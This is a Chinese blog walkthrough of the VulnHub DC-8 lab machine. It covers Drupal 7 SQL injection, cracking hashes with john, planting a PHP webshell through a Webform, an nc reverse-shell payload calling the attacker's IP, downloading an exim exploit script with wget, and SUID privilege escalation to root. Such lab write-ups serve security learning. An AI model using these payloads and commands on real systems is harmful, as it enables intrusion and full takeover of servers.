vulnhub靶机DC8

vulnhub靶机DC8

知识点:

Drupal 7 SQL注入
john破解HASH
Drupal 7 后台编辑页面 Getshell
eximSUID本地提权

信息收集

主机发现

1
nmap -sP 192.168.211.1/24

img

目标主机的ip为192.168.211.141
扫描靶机开放的端口服务

1
nmap -A 192.168.211.141 -p 1-65535

img

靶机开放了22端口和80端口
访问80端口

img

发现还是一个drupal网站并且显示此网站收到干扰
先扫描网站目录

1
Nikto -h 192.168.211.141

img

进行指纹识别whatweb 192.1 68.211.141 发现是一个drupal 7网站

img

getshell

我们发现左边这三项上下其实是不一样的,在contact us中为?sid 在dc-8中为?nid 但是只有在nid中发现有SQL注入点,并且很容易手工注入出用户名和密码

1
group_concat(table_name) from information_schema.tables where table_schema=database()

img

有两个用户,admin和john,将其放在john中破解密码

img

跑了很久之跑出了john的密码为turtle

img

去尝试登录,并且登录成功

img

找了很久,在Add content–>Webform去添加webshell

img

随便添加一个,点进去,在form setting里面发现可以写php

img

img

写入一句话木马

img

点击刚才创建的webshell用中国蚁剑连接

img

但是找不到路径,所以只能直接反弹shell

1
<?php system("nc -e /bin/bash 192.168.211.135 7777");  ?>

img

现在主机上监听7777端口

img

发现这些代码要提交表单后才能执行,之前创建的没有创建表单,所以直接在contact us里面编写反弹shell的代码

img

然后提交表单

img

成功getshell

img

然后使用python进入交互模式

1
python -c 'import pty;pty.spawn("/bin/bash")'

img

提权

linux里面有个suid权限执行二进制文件,这个权限涉及的命令权限都很大。
我们用find命令查询一下这些命令:

1
2
3
find / -perm -u=s -type f 2>/dev/null
或者
find / -perm -4000 2>/dev/null

img

发现exim4,查看对应版本信息

img

然后 使用searchsloit搜索

1
searchsploit exim

发现可利用的脚本

img

查看脚本

img
本地开启80端口,让靶机去下载该脚本python -m SimpleHTTPServer 80

img

img

使用wget下载,发现只有在tmp目录下有权限

1
wget http://192.168.211.135/exp.sh

img

根据脚本里面的方法提权(netcat)

img

发现文件无法执行,所以先给文件一个权限

1
chmod 777 exp.sh

img

kali监听31337端口—不用监听,脚本直接使用,不用修改
执行脚本./exp.sh -m netcat
成功反弹shell且为root权限

img

成功查看到flag

img

文章作者:CyzCc
最后更新:2020年06月05日 17:06:45
原始链接:https://cyzcc.vip/2020/03/07/vulnhub-DC8/
版权声明:转载请注明出处!
您的支持就是我的动力!
-------------    本文结束  感谢您的阅读    -------------